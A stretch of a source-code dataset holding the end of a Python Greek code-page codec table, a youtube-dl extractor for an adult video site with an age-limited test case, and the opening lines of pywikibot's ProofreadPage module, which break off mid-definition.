0x00ea: 0x0386, # GREEK CAPITAL LETTER ALPHA WITH TONOS
0x00eb: 0x0388, # GREEK CAPITAL LETTER EPSILON WITH TONOS
0x00ec: 0x0389, # GREEK CAPITAL LETTER ETA WITH TONOS
0x00ed: 0x038a, # GREEK CAPITAL LETTER IOTA WITH TONOS
0x00ee: 0x038c, # GREEK CAPITAL LETTER OMICRON WITH TONOS
0x00ef: 0x038e, # GREEK CAPITAL LETTER UPSILON WITH TONOS
0x00f0: 0x038f, # GREEK CAPITAL LETTER OMEGA WITH TONOS
0x00f1: 0x00b1, # PLUS-MINUS SIGN
0x00f2: 0x2265, # GREATER-THAN OR EQUAL TO
0x00f3: 0x2264, # LESS-THAN OR EQUAL TO
0x00f4: 0x03aa, # GREEK CAPITAL LETTER IOTA WITH DIALYTIKA
0x00f5: 0x03ab, # GREEK CAPITAL LETTER UPSILON WITH DIALYTIKA
0x00f6: 0x00f7, # DIVISION SIGN
0x00f7: 0x2248, # ALMOST EQUAL TO
0x00f8: 0x00b0, # DEGREE SIGN
0x00f9: 0x2219, # BULLET OPERATOR
0x00fa: 0x00b7, # MIDDLE DOT
0x00fb: 0x221a, # SQUARE ROOT
0x00fc: 0x207f, # SUPERSCRIPT LATIN SMALL LETTER N
0x00fd: 0x00b2, # SUPERSCRIPT TWO
0x00fe: 0x25a0, # BLACK SQUARE
0x00ff: 0x00a0, # NO-BREAK SPACE
})
### Decoding Table
decoding_table = (
'\x00' # 0x0000 -> NULL
'\x01' # 0x0001 -> START OF HEADING
'\x02' # 0x0002 -> START OF TEXT
'\x03' # 0x0003 -> END OF TEXT
'\x04' # 0x0004 -> END OF TRANSMISSION
'\x05' # 0x0005 -> ENQUIRY
'\x06' # 0x0006 -> ACKNOWLEDGE
'\x07' # 0x0007 -> BELL
'\x08' # 0x0008 -> BACKSPACE
'\t' # 0x0009 -> HORIZONTAL TABULATION
'\n' # 0x000a -> LINE FEED
'\x0b' # 0x000b -> VERTICAL TABULATION
'\x0c' # 0x000c -> FORM FEED
'\r' # 0x000d -> CARRIAGE RETURN
'\x0e' # 0x000e -> SHIFT OUT
'\x0f' # 0x000f -> SHIFT IN
'\x10' # 0x0010 -> DATA LINK ESCAPE
'\x11' # 0x0011 -> DEVICE CONTROL ONE
'\x12' # 0x0012 -> DEVICE CONTROL TWO
'\x13' # 0x0013 -> DEVICE CONTROL THREE
'\x14' # 0x0014 -> DEVICE CONTROL FOUR
'\x15' # 0x0015 -> NEGATIVE ACKNOWLEDGE
'\x16' # 0x0016 -> SYNCHRONOUS IDLE
'\x17' # 0x0017 -> END OF TRANSMISSION BLOCK
'\x18' # 0x0018 -> CANCEL
'\x19' # 0x0019 -> END OF MEDIUM
'\x1a' # 0x001a -> SUBSTITUTE
'\x1b' # 0x001b -> ESCAPE
'\x1c' # 0x001c -> FILE SEPARATOR
'\x1d' # 0x001d -> GROUP SEPARATOR
'\x1e' # 0x001e -> RECORD SEPARATOR
'\x1f' # 0x001f -> UNIT SEPARATOR
' ' # 0x0020 -> SPACE
'!' # 0x0021 -> EXCLAMATION MARK
'"' # 0x0022 -> QUOTATION MARK
'#' # 0x0023 -> NUMBER SIGN
'$' # 0x0024 -> DOLLAR SIGN
'%' # 0x0025 -> PERCENT SIGN
'&' # 0x0026 -> AMPERSAND
"'" # 0x0027 -> APOSTROPHE
'(' # 0x0028 -> LEFT PARENTHESIS
')' # 0x0029 -> RIGHT PARENTHESIS
'*' # 0x002a -> ASTERISK
'+' # 0x002b -> PLUS SIGN
',' # 0x002c -> COMMA
'-' # 0x002d -> HYPHEN-MINUS
'.' # 0x002e -> FULL STOP
'/' # 0x002f -> SOLIDUS
'0' # 0x0030 -> DIGIT ZERO
'1' # 0x0031 -> DIGIT ONE
'2' # 0x0032 -> DIGIT TWO
'3' # 0x0033 -> DIGIT THREE
'4' # 0x0034 -> DIGIT FOUR
'5' # 0x0035 -> DIGIT FIVE
'6' # 0x0036 -> DIGIT SIX
'7' # 0x0037 -> DIGIT SEVEN
'8' # 0x0038 -> DIGIT EIGHT
'9' # 0x0039 -> DIGIT NINE
':' # 0x003a -> COLON
';' # 0x003b -> SEMICOLON
'<' # 0x003c -> LESS-THAN SIGN
'=' # 0x003d -> EQUALS SIGN
'>' # 0x003e -> GREATER-THAN SIGN
'?' # 0x003f -> QUESTION MARK
'@' # 0x0040 -> COMMERCIAL AT
'A' # 0x0041 -> LATIN CAPITAL LETTER A
'B' # 0x0042 -> LATIN CAPITAL LETTER B
'C' # 0x0043 -> LATIN CAPITAL LETTER C
'D' # 0x0044 -> LATIN CAPITAL LETTER D
'E' # 0x0045 -> LATIN CAPITAL LETTER E
'F' # 0x0046 -> LATIN CAPITAL LETTER F
'G' # 0x0047 -> LATIN CAPITAL LETTER G
'H' # 0x0048 -> LATIN CAPITAL LETTER H
'I' # 0x0049 -> LATIN CAPITAL LETTER I
'J' # 0x004a -> LATIN CAPITAL LETTER J
'K' # 0x004b -> LATIN CAPITAL LETTER K
'L' # 0x004c -> LATIN CAPITAL LETTER L
'M' # 0x004d -> LATIN CAPITAL LETTER M
'N' # 0x004e -> LATIN CAPITAL LETTER N
'O' # 0x004f -> LATIN CAPITAL LETTER O
'P' # 0x0050 -> LATIN CAPITAL LETTER P
'Q' # 0x0051 -> LATIN CAPITAL LETTER Q
'R' # 0x0052 -> LATIN CAPITAL LETTER R
'S' # 0x0053 -> LATIN CAPITAL LETTER S
'T' # 0x0054 -> LATIN CAPITAL LETTER T
'U' # 0x0055 -> LATIN CAPITAL LETTER U
'V' # 0x0056 -> LATIN CAPITAL LETTER V
'W' # 0x0057 -> LATIN CAPITAL LETTER W
'X' # 0x0058 -> LATIN CAPITAL LETTER X
'Y' # 0x0059 -> LATIN CAPITAL LETTER Y
'Z' # 0x005a -> LATIN CAPITAL LETTER Z
'[' # 0x005b -> LEFT SQUARE BRACKET
'\\' # 0x005c -> REVERSE SOLIDUS
']' # 0x005d -> RIGHT SQUARE BRACKET
'^' # 0x005e -> CIRCUMFLEX ACCENT
'_' # 0x005f -> LOW LINE
'`' # 0x0060 -> GRAVE ACCENT
'a' # 0x0061 -> LATIN SMALL LETTER A
'b' # 0x0062 -> LATIN SMALL LETTER B
'c' # 0x0063 -> LATIN SMALL LETTER C
'd' # 0x0064 -> LATIN SMALL LETTER D
'e' # 0x0065 -> LATIN SMALL LETTER E
'f' # 0x0066 -> LATIN SMALL LETTER F
'g' # 0x0067 -> LATIN SMALL LETTER G
'h' # 0x0068 -> LATIN SMALL LETTER H
'i' # 0x0069 -> LATIN SMALL LETTER I
'j' # 0x006a -> LATIN SMALL LETTER J
'k' # 0x006b -> LATIN SMALL LETTER K
'l' # 0x006c -> LATIN SMALL LETTER L
'm' # 0x006d -> LATIN SMALL LETTER M
'n' # 0x006e -> LATIN SMALL LETTER N
'o' # 0x006f -> LATIN SMALL LETTER O
'p' # 0x0070 -> LATIN SMALL LETTER P
'q' # 0x0071 -> LATIN SMALL LETTER Q
'r' # 0x0072 -> LATIN SMALL LETTER R
's' # 0x0073 -> LATIN SMALL LETTER S
't' # 0x0074 -> LATIN SMALL LETTER T
'u' # 0x0075 -> LATIN SMALL LETTER U
'v' # 0x0076 -> LATIN SMALL LETTER V
'w' # 0x0077 -> LATIN SMALL LETTER W
'x' # 0x0078 -> LATIN SMALL LETTER X
'y' # 0x0079 -> LATIN SMALL LETTER Y
'z' # 0x007a -> LATIN SMALL LETTER Z
'{' # 0x007b -> LEFT CURLY BRACKET
'|' # 0x007c -> VERTICAL LINE
'}' # 0x007d -> RIGHT CURLY BRACKET
'~' # 0x007e -> TILDE
'\x7f' # 0x007f -> DELETE
'\u0391' # 0x0080 -> GREEK CAPITAL LETTER ALPHA
'\u0392' # 0x0081 -> GREEK CAPITAL LETTER BETA
'\u0393' # 0x0082 -> GREEK CAPITAL LETTER GAMMA
'\u0394' # 0x0083 -> GREEK CAPITAL LETTER DELTA
'\u0395' # 0x0084 -> GREEK CAPITAL LETTER EPSILON
'\u0396' # 0x0085 -> GREEK CAPITAL LETTER ZETA
'\u0397' # 0x0086 -> GREEK CAPITAL LETTER ETA
'\u0398' # 0x0087 -> GREEK CAPITAL LETTER THETA
'\u0399' # 0x0088 -> GREEK CAPITAL LETTER IOTA
'\u039a' # 0x0089 -> GREEK CAPITAL LETTER KAPPA
'\u039b' # 0x008a -> GREEK CAPITAL LETTER LAMDA
'\u039c' # 0x008b -> GREEK CAPITAL LETTER MU
'\u039d' # 0x008c -> GREEK CAPITAL LETTER NU
'\u039e' # 0x008d -> GREEK CAPITAL LETTER XI
'\u039f' # 0x008e -> GREEK CAPITAL LETTER OMICRON
'\u03a0' # 0x008f -> GREEK CAPITAL LETTER PI
'\u03a1' # 0x0090 -> GREEK CAPITAL LETTER RHO
'\u03a3' # 0x0091 -> GREEK CAPITAL LETTER SIGMA
'\u03a4' # 0x0092 -> GREEK CAPITAL LETTER TAU
'\u03a5' # 0x0093 -> GREEK CAPITAL LETTER UPSILON
'\u03a6' # 0x0094 -> GREEK CAPITAL LETTER PHI
'\u03a7' # 0x0095 -> GREEK CAPITAL LETTER CHI
'\u03a8' # 0x0096 -> GREEK CAPITAL LETTER PSI
'\u03a9' # 0x0097 -> GREEK CAPITAL LETTER OMEGA
'\u03b1' # 0x0098 -> GREEK SMALL LETTER ALPHA
'\u03b2' # 0x0099 -> GREEK SMALL LETTER BETA
'\u03b3' # 0x009a -> GREEK SMALL LETTER GAMMA
'\u03b4' # 0x009b -> GREEK SMALL LETTER DELTA
'\u03b5' # 0x009c -> GREEK SMALL LETTER EPSILON
'\u03b6' # 0x009d -> GREEK SMALL LETTER ZETA
'\u03b7' # 0x009e -> GREEK SMALL LETTER ETA
'\u03b8' # 0x009f -> GREEK SMALL LETTER THETA
'\u03b9' # 0x00a0 -> GREEK SMALL LETTER IOTA
'\u03ba' # 0x00a1 -> GREEK SMALL LETTER KAPPA
'\u03bb' # 0x00a2 -> GREEK SMALL LETTER LAMDA
'\u03bc' # 0x00a3 -> GREEK SMALL LETTER MU
'\u03bd' # 0x00a4 -> GREEK SMALL LETTER NU
'\u03be' # 0x00a5 -> GREEK SMALL LETTER XI
'\u03bf' # 0x00a6 -> GREEK SMALL LETTER OMICRON
'\u03c0' # 0x00a7 -> GREEK SMALL LETTER PI
'\u03c1' # 0x00a8 -> GREEK SMALL LETTER RHO
'\u03c3' # 0x00a9 -> GREEK SMALL LETTER SIGMA
'\u03c2' # 0x00aa -> GREEK SMALL LETTER FINAL SIGMA
'\u03c4' # 0x00ab -> GREEK SMALL LETTER TAU
'\u03c5' # 0x00ac -> GREEK SMALL LETTER UPSILON
'\u03c6' # 0x00ad -> GREEK SMALL LETTER PHI
'\u03c7' # 0x00ae -> GREEK SMALL LETTER CHI
'\u03c8' # 0x00af -> GREEK SMALL LETTER PSI
'\u2591' # 0x00b0 -> LIGHT SHADE
'\u2592' # 0x00b1 -> MEDIUM SHADE
'\u2593' # 0x00b2 -> DARK SHADE
'\u2502' # 0x00b3 -> BOX DRAWINGS LIGHT VERTICAL
'\u2524' # 0x00b4 -> BOX DRAWINGS LIGHT VERTICAL AND LEFT
'\u2561' # 0x00b5 -> BOX DRAWINGS VERTICAL SINGLE AND LEFT DOUBLE
'\u2562' # 0x00b6 -> BOX DRAWINGS VERTICAL DOUBLE AND LEFT SINGLE
'\u2556' # 0x00b7 -> BOX DRAWINGS DOWN DOUBLE AND LEFT SINGLE
'\u2555' # 0x00b8 -> BOX DRAWINGS DOWN SINGLE AND LEFT DOUBLE
'\u2563' # 0x00b9 -> BOX DRAWINGS DOUBLE VERTICAL AND LEFT
'\u2551' # 0x00ba -> BOX DRAWINGS DOUBLE VERTICAL
'\u2557' # 0x00bb -> BOX DRAWINGS DOUBLE DOWN AND LEFT
'\u255d' # 0x00bc -> BOX DRAWINGS DOUBLE UP AND LEFT
'\u255c' # 0x00bd -> BOX DRAWINGS UP DOUBLE AND LEFT SINGLE
'\u255b' # 0x00be -> BOX DRAWINGS UP SINGLE AND LEFT DOUBLE
'\u2510' # 0x00bf -> BOX DRAWINGS LIGHT DOWN AND LEFT
'\u2514' # 0x00c0 -> BOX DRAWINGS LIGHT UP AND RIGHT
'\u2534' # 0x00c1 -> BOX DRAWINGS LIGHT UP AND HORIZONTAL
'\u252c' # 0x00c2 -> BOX DRAWINGS LIGHT DOWN AND HORIZONTAL
'\u251c' # 0x00c3 -> BOX DRAWINGS LIGHT VERTICAL AND RIGHT
'\u2500' # 0x00c4 -> BOX DRAWINGS LIGHT HORIZONTAL
'\u253c' # 0x00c5 -> BOX DRAWINGS LIGHT VERTICAL AND HORIZONTAL
'\u255e' # 0x00c6 -> BOX DRAWINGS VERTICAL SINGLE AND RIGHT DOUBLE
'\u255f' # 0x00c7 -> BOX DRAWINGS VERTICAL DOUBLE AND RIGHT SINGLE
'\u255a' # 0x00c8 -> BOX DRAWINGS DOUBLE UP AND RIGHT
'\u2554' # 0x00c9 -> BOX DRAWINGS DOUBLE DOWN AND RIGHT
'\u2569' # 0x00ca -> BOX DRAWINGS DOUBLE UP AND HORIZONTAL
'\u2566' # 0x00cb -> BOX DRAWINGS DOUBLE DOWN AND HORIZONTAL
'\u2560' # 0x00cc -> BOX DRAWINGS DOUBLE VERTICAL AND RIGHT
'\u2550' # 0x00cd -> BOX DRAWINGS DOUBLE HORIZONTAL
'\u256c' # 0x00ce -> BOX DRAWINGS DOUBLE VERTICAL AND HORIZONTAL
'\u2567' # 0x00cf -> BOX DRAWINGS UP SINGLE AND HORIZONTAL DOUBLE
'\u2568' # 0x00d0 -> BOX DRAWINGS UP DOUBLE AND HORIZONTAL SINGLE
'\u2564' # 0x00d1 -> BOX DRAWINGS DOWN SINGLE AND HORIZONTAL DOUBLE
'\u2565' # 0x00d2 -> BOX DRAWINGS DOWN DOUBLE AND HORIZONTAL SINGLE
'\u2559' # 0x00d3 -> BOX DRAWINGS UP DOUBLE AND RIGHT SINGLE
'\u2558' # 0x00d4 -> BOX DRAWINGS UP SINGLE AND RIGHT DOUBLE
'\u2552' # 0x00d5 -> BOX DRAWINGS DOWN SINGLE AND RIGHT DOUBLE
'\u2553' # 0x00d6 -> BOX DRAWINGS DOWN DOUBLE AND RIGHT SINGLE
'\u256b' # 0x00d7 -> BOX DRAWINGS VERTICAL DOUBLE AND HORIZONTAL SINGLE
'\u256a' # 0x00d8 -> BOX DRAWINGS VERTICAL SINGLE AND HORIZONTAL DOUBLE
'\u2518' # 0x00d9 -> BOX DRAWINGS LIGHT UP AND LEFT
'\u250c' # 0x00da -> BOX DRAWINGS LIGHT DOWN AND RIGHT
'\u2588' # 0x00db -> FULL BLOCK
'\u2584' # 0x00dc -> LOWER HALF BLOCK
'\u258c' # 0x00dd -> LEFT HALF BLOCK
'\u2590' # 0x00de -> RIGHT HALF BLOCK
'\u2580' # 0x00df -> UPPER HALF BLOCK
'\u03c9' # 0x00e0 -> GREEK SMALL LETTER OMEGA
'\u03ac' # 0x00e1 -> GREEK SMALL LETTER ALPHA WITH TONOS
'\u03ad' # 0x00e2 -> GREEK SMALL LETTER EPSILON WITH TONOS
'\u03ae' # 0x00e3 -> GREEK SMALL LETTER ETA WITH TONOS
'\u03ca' # 0x00e4 -> GREEK SMALL LETTER IOTA WITH DIALYTIKA
'\u03af' # 0x00e5 -> GREEK SMALL LETTER IOTA WITH TONOS
'\u03cc' # 0x00e6 -> GREEK SMALL LETTER OMICRON WITH TONOS
'\u03cd' # 0x00e7 -> GREEK SMALL LETTER UPSILON WITH TONOS
'\u03cb' # 0x00e8 -> GREEK SMALL LETTER UPSILON WITH DIALYTIKA
'\u03ce' # 0x00e9 -> GREEK SMALL LETTER OMEGA WITH TONOS
'\u0386' # 0x00ea -> GREEK CAPITAL LETTER ALPHA WITH TONOS
'\u0388' # 0x00eb -> GREEK CAPITAL LETTER EPSILON WITH TONOS
'\u0389' # 0x00ec -> GREEK CAPITAL LETTER ETA WITH TONOS
'\u038a' # 0x00ed -> GREEK CAPITAL LETTER IOTA WITH TONOS
'\u038c' # 0x00ee -> GREEK CAPITAL LETTER OMICRON WITH TONOS
'\u038e' # 0x00ef -> GREEK CAPITAL LETTER UPSILON WITH TONOS
'\u038f' # 0x00f0 -> GREEK CAPITAL LETTER OMEGA WITH TONOS
'\xb1' # 0x00f1 -> PLUS-MINUS SIGN
'\u2265' # 0x00f2 -> GREATER-THAN OR EQUAL TO
'\u2264' # 0x00f3 -> LESS-THAN OR EQUAL TO
'\u03aa' # 0x00f4 -> GREEK CAPITAL LETTER IOTA WITH DIALYTIKA
'\u03ab' # 0x00f5 -> GREEK CAPITAL LETTER UPSILON WITH DIALYTIKA
'\xf7' # 0x00f6 -> DIVISION SIGN
'\u2248' # 0x00f7 -> ALMOST EQUAL TO
'\xb0' # 0x00f8 -> DEGREE SIGN
'\u2219' # 0x00f9 -> BULLET OPERATOR
'\xb7' # 0x00fa -> MIDDLE DOT
'\u221a' # 0x00fb -> SQUARE ROOT
'\u207f' # 0x00fc -> SUPERSCRIPT LATIN SMALL LETTER N
'\xb2' # 0x00fd -> SUPERSCRIPT TWO
'\u25a0' # 0x00fe -> BLACK SQUARE
'\xa0' # 0x00ff -> NO-BREAK SPACE
)
### Encoding Map
# Code points 0x00-0x7f are identical to ASCII in this code page, so the
# 128 identity entries are generated instead of being spelled out one by
# one.  The resulting dict is exactly the same mapping as before.
encoding_map = {code: code for code in range(0x80)}

# Non-ASCII part of the code page (Greek letters, box drawing, blocks).
encoding_map.update({
    0x00a0: 0x00ff,  # NO-BREAK SPACE
    0x00b0: 0x00f8,  # DEGREE SIGN
    0x00b1: 0x00f1,  # PLUS-MINUS SIGN
    0x00b2: 0x00fd,  # SUPERSCRIPT TWO
    0x00b7: 0x00fa,  # MIDDLE DOT
    0x00f7: 0x00f6,  # DIVISION SIGN
    0x0386: 0x00ea,  # GREEK CAPITAL LETTER ALPHA WITH TONOS
    0x0388: 0x00eb,  # GREEK CAPITAL LETTER EPSILON WITH TONOS
    0x0389: 0x00ec,  # GREEK CAPITAL LETTER ETA WITH TONOS
    0x038a: 0x00ed,  # GREEK CAPITAL LETTER IOTA WITH TONOS
    0x038c: 0x00ee,  # GREEK CAPITAL LETTER OMICRON WITH TONOS
    0x038e: 0x00ef,  # GREEK CAPITAL LETTER UPSILON WITH TONOS
    0x038f: 0x00f0,  # GREEK CAPITAL LETTER OMEGA WITH TONOS
    0x0391: 0x0080,  # GREEK CAPITAL LETTER ALPHA
    0x0392: 0x0081,  # GREEK CAPITAL LETTER BETA
    0x0393: 0x0082,  # GREEK CAPITAL LETTER GAMMA
    0x0394: 0x0083,  # GREEK CAPITAL LETTER DELTA
    0x0395: 0x0084,  # GREEK CAPITAL LETTER EPSILON
    0x0396: 0x0085,  # GREEK CAPITAL LETTER ZETA
    0x0397: 0x0086,  # GREEK CAPITAL LETTER ETA
    0x0398: 0x0087,  # GREEK CAPITAL LETTER THETA
    0x0399: 0x0088,  # GREEK CAPITAL LETTER IOTA
    0x039a: 0x0089,  # GREEK CAPITAL LETTER KAPPA
    0x039b: 0x008a,  # GREEK CAPITAL LETTER LAMDA
    0x039c: 0x008b,  # GREEK CAPITAL LETTER MU
    0x039d: 0x008c,  # GREEK CAPITAL LETTER NU
    0x039e: 0x008d,  # GREEK CAPITAL LETTER XI
    0x039f: 0x008e,  # GREEK CAPITAL LETTER OMICRON
    0x03a0: 0x008f,  # GREEK CAPITAL LETTER PI
    0x03a1: 0x0090,  # GREEK CAPITAL LETTER RHO
    0x03a3: 0x0091,  # GREEK CAPITAL LETTER SIGMA
    0x03a4: 0x0092,  # GREEK CAPITAL LETTER TAU
    0x03a5: 0x0093,  # GREEK CAPITAL LETTER UPSILON
    0x03a6: 0x0094,  # GREEK CAPITAL LETTER PHI
    0x03a7: 0x0095,  # GREEK CAPITAL LETTER CHI
    0x03a8: 0x0096,  # GREEK CAPITAL LETTER PSI
    0x03a9: 0x0097,  # GREEK CAPITAL LETTER OMEGA
    0x03aa: 0x00f4,  # GREEK CAPITAL LETTER IOTA WITH DIALYTIKA
    0x03ab: 0x00f5,  # GREEK CAPITAL LETTER UPSILON WITH DIALYTIKA
    0x03ac: 0x00e1,  # GREEK SMALL LETTER ALPHA WITH TONOS
    0x03ad: 0x00e2,  # GREEK SMALL LETTER EPSILON WITH TONOS
    0x03ae: 0x00e3,  # GREEK SMALL LETTER ETA WITH TONOS
    0x03af: 0x00e5,  # GREEK SMALL LETTER IOTA WITH TONOS
    0x03b1: 0x0098,  # GREEK SMALL LETTER ALPHA
    0x03b2: 0x0099,  # GREEK SMALL LETTER BETA
    0x03b3: 0x009a,  # GREEK SMALL LETTER GAMMA
    0x03b4: 0x009b,  # GREEK SMALL LETTER DELTA
    0x03b5: 0x009c,  # GREEK SMALL LETTER EPSILON
    0x03b6: 0x009d,  # GREEK SMALL LETTER ZETA
    0x03b7: 0x009e,  # GREEK SMALL LETTER ETA
    0x03b8: 0x009f,  # GREEK SMALL LETTER THETA
    0x03b9: 0x00a0,  # GREEK SMALL LETTER IOTA
    0x03ba: 0x00a1,  # GREEK SMALL LETTER KAPPA
    0x03bb: 0x00a2,  # GREEK SMALL LETTER LAMDA
    0x03bc: 0x00a3,  # GREEK SMALL LETTER MU
    0x03bd: 0x00a4,  # GREEK SMALL LETTER NU
    0x03be: 0x00a5,  # GREEK SMALL LETTER XI
    0x03bf: 0x00a6,  # GREEK SMALL LETTER OMICRON
    0x03c0: 0x00a7,  # GREEK SMALL LETTER PI
    0x03c1: 0x00a8,  # GREEK SMALL LETTER RHO
    0x03c2: 0x00aa,  # GREEK SMALL LETTER FINAL SIGMA
    0x03c3: 0x00a9,  # GREEK SMALL LETTER SIGMA
    0x03c4: 0x00ab,  # GREEK SMALL LETTER TAU
    0x03c5: 0x00ac,  # GREEK SMALL LETTER UPSILON
    0x03c6: 0x00ad,  # GREEK SMALL LETTER PHI
    0x03c7: 0x00ae,  # GREEK SMALL LETTER CHI
    0x03c8: 0x00af,  # GREEK SMALL LETTER PSI
    0x03c9: 0x00e0,  # GREEK SMALL LETTER OMEGA
    0x03ca: 0x00e4,  # GREEK SMALL LETTER IOTA WITH DIALYTIKA
    0x03cb: 0x00e8,  # GREEK SMALL LETTER UPSILON WITH DIALYTIKA
    0x03cc: 0x00e6,  # GREEK SMALL LETTER OMICRON WITH TONOS
    0x03cd: 0x00e7,  # GREEK SMALL LETTER UPSILON WITH TONOS
    0x03ce: 0x00e9,  # GREEK SMALL LETTER OMEGA WITH TONOS
    0x207f: 0x00fc,  # SUPERSCRIPT LATIN SMALL LETTER N
    0x2219: 0x00f9,  # BULLET OPERATOR
    0x221a: 0x00fb,  # SQUARE ROOT
    0x2248: 0x00f7,  # ALMOST EQUAL TO
    0x2264: 0x00f3,  # LESS-THAN OR EQUAL TO
    0x2265: 0x00f2,  # GREATER-THAN OR EQUAL TO
    0x2500: 0x00c4,  # BOX DRAWINGS LIGHT HORIZONTAL
    0x2502: 0x00b3,  # BOX DRAWINGS LIGHT VERTICAL
    0x250c: 0x00da,  # BOX DRAWINGS LIGHT DOWN AND RIGHT
    0x2510: 0x00bf,  # BOX DRAWINGS LIGHT DOWN AND LEFT
    0x2514: 0x00c0,  # BOX DRAWINGS LIGHT UP AND RIGHT
    0x2518: 0x00d9,  # BOX DRAWINGS LIGHT UP AND LEFT
    0x251c: 0x00c3,  # BOX DRAWINGS LIGHT VERTICAL AND RIGHT
    0x2524: 0x00b4,  # BOX DRAWINGS LIGHT VERTICAL AND LEFT
    0x252c: 0x00c2,  # BOX DRAWINGS LIGHT DOWN AND HORIZONTAL
    0x2534: 0x00c1,  # BOX DRAWINGS LIGHT UP AND HORIZONTAL
    0x253c: 0x00c5,  # BOX DRAWINGS LIGHT VERTICAL AND HORIZONTAL
    0x2550: 0x00cd,  # BOX DRAWINGS DOUBLE HORIZONTAL
    0x2551: 0x00ba,  # BOX DRAWINGS DOUBLE VERTICAL
    0x2552: 0x00d5,  # BOX DRAWINGS DOWN SINGLE AND RIGHT DOUBLE
    0x2553: 0x00d6,  # BOX DRAWINGS DOWN DOUBLE AND RIGHT SINGLE
    0x2554: 0x00c9,  # BOX DRAWINGS DOUBLE DOWN AND RIGHT
    0x2555: 0x00b8,  # BOX DRAWINGS DOWN SINGLE AND LEFT DOUBLE
    0x2556: 0x00b7,  # BOX DRAWINGS DOWN DOUBLE AND LEFT SINGLE
    0x2557: 0x00bb,  # BOX DRAWINGS DOUBLE DOWN AND LEFT
    0x2558: 0x00d4,  # BOX DRAWINGS UP SINGLE AND RIGHT DOUBLE
    0x2559: 0x00d3,  # BOX DRAWINGS UP DOUBLE AND RIGHT SINGLE
    0x255a: 0x00c8,  # BOX DRAWINGS DOUBLE UP AND RIGHT
    0x255b: 0x00be,  # BOX DRAWINGS UP SINGLE AND LEFT DOUBLE
    0x255c: 0x00bd,  # BOX DRAWINGS UP DOUBLE AND LEFT SINGLE
    0x255d: 0x00bc,  # BOX DRAWINGS DOUBLE UP AND LEFT
    0x255e: 0x00c6,  # BOX DRAWINGS VERTICAL SINGLE AND RIGHT DOUBLE
    0x255f: 0x00c7,  # BOX DRAWINGS VERTICAL DOUBLE AND RIGHT SINGLE
    0x2560: 0x00cc,  # BOX DRAWINGS DOUBLE VERTICAL AND RIGHT
    0x2561: 0x00b5,  # BOX DRAWINGS VERTICAL SINGLE AND LEFT DOUBLE
    0x2562: 0x00b6,  # BOX DRAWINGS VERTICAL DOUBLE AND LEFT SINGLE
    0x2563: 0x00b9,  # BOX DRAWINGS DOUBLE VERTICAL AND LEFT
    0x2564: 0x00d1,  # BOX DRAWINGS DOWN SINGLE AND HORIZONTAL DOUBLE
    0x2565: 0x00d2,  # BOX DRAWINGS DOWN DOUBLE AND HORIZONTAL SINGLE
    0x2566: 0x00cb,  # BOX DRAWINGS DOUBLE DOWN AND HORIZONTAL
    0x2567: 0x00cf,  # BOX DRAWINGS UP SINGLE AND HORIZONTAL DOUBLE
    0x2568: 0x00d0,  # BOX DRAWINGS UP DOUBLE AND HORIZONTAL SINGLE
    0x2569: 0x00ca,  # BOX DRAWINGS DOUBLE UP AND HORIZONTAL
    0x256a: 0x00d8,  # BOX DRAWINGS VERTICAL SINGLE AND HORIZONTAL DOUBLE
    0x256b: 0x00d7,  # BOX DRAWINGS VERTICAL DOUBLE AND HORIZONTAL SINGLE
    0x256c: 0x00ce,  # BOX DRAWINGS DOUBLE VERTICAL AND HORIZONTAL
    0x2580: 0x00df,  # UPPER HALF BLOCK
    0x2584: 0x00dc,  # LOWER HALF BLOCK
    0x2588: 0x00db,  # FULL BLOCK
    0x258c: 0x00dd,  # LEFT HALF BLOCK
    0x2590: 0x00de,  # RIGHT HALF BLOCK
    0x2591: 0x00b0,  # LIGHT SHADE
    0x2592: 0x00b1,  # MEDIUM SHADE
    0x2593: 0x00b2,  # DARK SHADE
    0x25a0: 0x00fe,  # BLACK SQUARE
})
| mit |
paukenba/youtube-dl | youtube_dl/extractor/xbef.py | 105 | 1444 | from __future__ import unicode_literals
from .common import InfoExtractor
from ..compat import compat_urllib_parse_unquote
class XBefIE(InfoExtractor):
    _VALID_URL = r'http://(?:www\.)?xbef\.com/video/(?P<id>[0-9]+)'
    _TEST = {
        'url': 'http://xbef.com/video/5119-glamourous-lesbians-smoking-drinking-and-fucking',
        'md5': 'a478b565baff61634a98f5e5338be995',
        'info_dict': {
            'id': '5119',
            'ext': 'mp4',
            'title': 'md5:7358a9faef8b7b57acda7c04816f170e',
            'age_limit': 18,
            'thumbnail': 're:^http://.*\.jpg',
        }
    }

    def _real_extract(self, url):
        """Extract video metadata from an xbef.com video page."""
        video_id = self._match_id(url)
        webpage = self._download_webpage(url, video_id)

        # The page <h1> carries the video title.
        title = self._html_search_regex(
            r'<h1[^>]*>(.*?)</h1>', webpage, 'title')

        # The player config URL is served percent-encoded; decode it
        # before fetching the XML config document it points to.
        encoded_config_url = self._download_webpage(
            'http://xbef.com/Main/GetVideoURLEncoded/%s' % video_id, video_id,
            note='Retrieving config URL')
        config = self._download_xml(
            compat_urllib_parse_unquote(encoded_config_url), video_id,
            note='Retrieving config')

        # The config XML exposes the media file and thumbnail URLs.
        return {
            'id': video_id,
            'url': config.find('./file').text,
            'title': title,
            'thumbnail': config.find('./image').text,
            'age_limit': 18,
        }
| unlicense |
npdoty/pywikibot | pywikibot/proofreadpage.py | 3 | 33142 | # -*- coding: utf-8 -*-
"""
Objects used with ProofreadPage Extension.
The extension is supported by MW 1.21+.
This module includes objects:
* ProofreadPage(Page)
* FullHeader
* IndexPage(Page)
OCR support of page scans via:
- https://tools.wmflabs.org/phetools/hocr_cgi.py
- https://tools.wmflabs.org/phetools/ocr.php
inspired by https://en.wikisource.org/wiki/MediaWiki:Gadget-ocr.js
"""
#
# (C) Pywikibot team, 2015-2017
#
# Distributed under the terms of the MIT license.
#
from __future__ import absolute_import, unicode_literals
__version__ = '$Id$'
from functools import partial
import json
import re
# BeautifulSoup is an optional dependency.  On ImportError the exception
# object itself is stored in the name, so the error surfaces only when
# (and if) BeautifulSoup is actually used at runtime.
try:
    from bs4 import BeautifulSoup, FeatureNotFound
except ImportError as e:
    BeautifulSoup = e
else:
    # Prefer the faster lxml parser; fall back to the bundled
    # html.parser when lxml is not installed.
    try:
        BeautifulSoup('', 'lxml')
    except FeatureNotFound:
        Soup = partial(BeautifulSoup, features='html.parser')
    else:
        Soup = partial(BeautifulSoup, features='lxml')
import pywikibot
from pywikibot.comms import http
from pywikibot.data.api import Request
_logger = 'proofreadpage'
class FullHeader(object):

    """Parsed representation of a ProofreadPage header section.

    Exposes the quality level, last user and free-text header parsed
    from the raw header wikitext, and serializes back via str().
    """

    p_header = re.compile(
